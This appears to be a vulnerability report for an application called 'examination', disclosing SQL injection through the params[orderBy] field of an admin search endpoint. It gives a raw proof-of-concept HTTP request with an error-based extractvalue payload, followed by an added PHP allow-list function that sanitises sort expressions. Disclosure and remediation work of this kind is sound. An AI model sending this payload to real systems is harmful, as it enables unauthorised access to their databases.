examination
admin/admin/authority/search has a SQL injection vulnerability
Vulnerability Product: examination
Vulnerability type: SQL injection
Vulnerability Details: admin/admin/authority/search
URL: admin/admin/authority/search
PoC (the injected value is in the params[orderBy] body parameter):
POST /admin/admin/authority/search HTTP/1.1
Host: 192.168.3.129:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 975
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ace_settings=%7B%22sidebar-collapsed%22%3A-1%7D; Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1678157952; Hm_lpvt_d3b3b1b968a56124689d1366adeacf8f=1678169014; PHPSESSID=s0dfimdr2smjmr3074qpav8po2; _admin=90cb44057f6077d07dc09f747754e4ea1023f1d289f128c441138467bbf77bb3a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22_admin%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22tGaaJtNH3SXtUEJtA6LIgNb0LQPEjste%22%2C2592000%5D%22%3B%7D; _csrf=d2ae05f533b7d5d759466c965771950e3a44d9703c618e14b02f805ca2430034a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222YAZrBa_nRKs7CoKBIVaKhRQvAAV1_Up%22%3B%7D
Origin: http://192.168.3.129:8092
Referer: http://192.168.3.129:8092/admin/admin/authority/index
X-Csrf-Token: 2UYjigTRJJSgdpRzR1Ziht5RjECmSp-frEnZbnTCJSfrH2LQdpNFy84k3wBwFQ3NnBjaIe0izc7aCJg4RZ1wVw==
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bSearchable_0=true&bSearchable_1=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSortable_0=false&bSortable_1=true&bSortable_2=false&bSortable_3=false&bSortable_4=false&bSortable_5=false&bSortable_6=true&bSortable_7=true&bSortable_8=false&iColumns=9&iDisplayLength=10&iDisplayStart=0&iSortCol_0=6&iSortingCols=1&mDataProp_0=&mDataProp_1=type&mDataProp_2=name&mDataProp_3=name&mDataProp_4=description&mDataProp_5=rule_name&mDataProp_6=created_at&mDataProp_7=updated_at&mDataProp_8=&params%5BorderBy%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281349049144%29%29%29&sColumns=%2C%2C%2C%2C%2C%2C%2C%2C&sEcho=1&sSearch=&sSearch_0=&sSearch_1=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSortDir_0=desc
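
The value in params[orderBy] is a sort expression, and a sort expression cannot be bound as a query parameter the way a data value can, so it has to be checked against an allow-list before it reaches SQL. The following is an added example, not code from the examination project: PHP is assumed from the PHPSESSID cookie, MySQL from the extractvalue() call, and the safeOrderBy helper and its column list (taken from the mDataProp_* fields) are hypothetical.

```php
<?php
declare(strict_types=1);

// Assumed sortable columns: the non-empty mDataProp_* names in the request above.
const SORTABLE_COLUMNS = ['type', 'name', 'description', 'rule_name', 'created_at', 'updated_at'];

/**
 * Hypothetical helper (not from the examination code base).
 * Accepts "col", "col asc" or "col desc", comma separated, and returns a
 * MySQL ORDER BY fragment built only from allow-listed names. Anything else
 * is discarded in favour of a fixed default, so no client text reaches SQL.
 */
function safeOrderBy(?string $raw, string $default = '`created_at` DESC'): string
{
    if ($raw === null || trim($raw) === '') {
        return $default;
    }
    $terms = [];
    foreach (explode(',', $raw) as $term) {
        // A term is a bare identifier with an optional direction keyword.
        if (!preg_match('/^\s*([A-Za-z_][A-Za-z0-9_]*)(?:\s+(asc|desc))?\s*$/iD', $term, $m)) {
            return $default;
        }
        // Strict comparison: the name must be one of the known columns.
        if (!in_array($m[1], SORTABLE_COLUMNS, true)) {
            return $default;
        }
        $terms[] = '`' . $m[1] . '` ' . strtoupper($m[2] ?? 'ASC');
    }
    return implode(', ', $terms);
}

// Constructed request bodies: the first carries the orderBy value from the PoC,
// the second a legitimate sort.
$bodies = [
    'iDisplayLength=10&params%5BorderBy%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281349049144%29%29%29',
    'iDisplayLength=10&params%5BorderBy%5D=created_at+desc%2C+name',
];
foreach ($bodies as $body) {
    parse_str($body, $post);   // decodes params[orderBy] into $post['params']['orderBy']
    $raw = $post['params']['orderBy'] ?? null;
    // A non-string value (e.g. params[orderBy][]=x) is treated as absent.
    echo 'ORDER BY ', safeOrderBy(is_string($raw) ? $raw : null), PHP_EOL;
}
```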
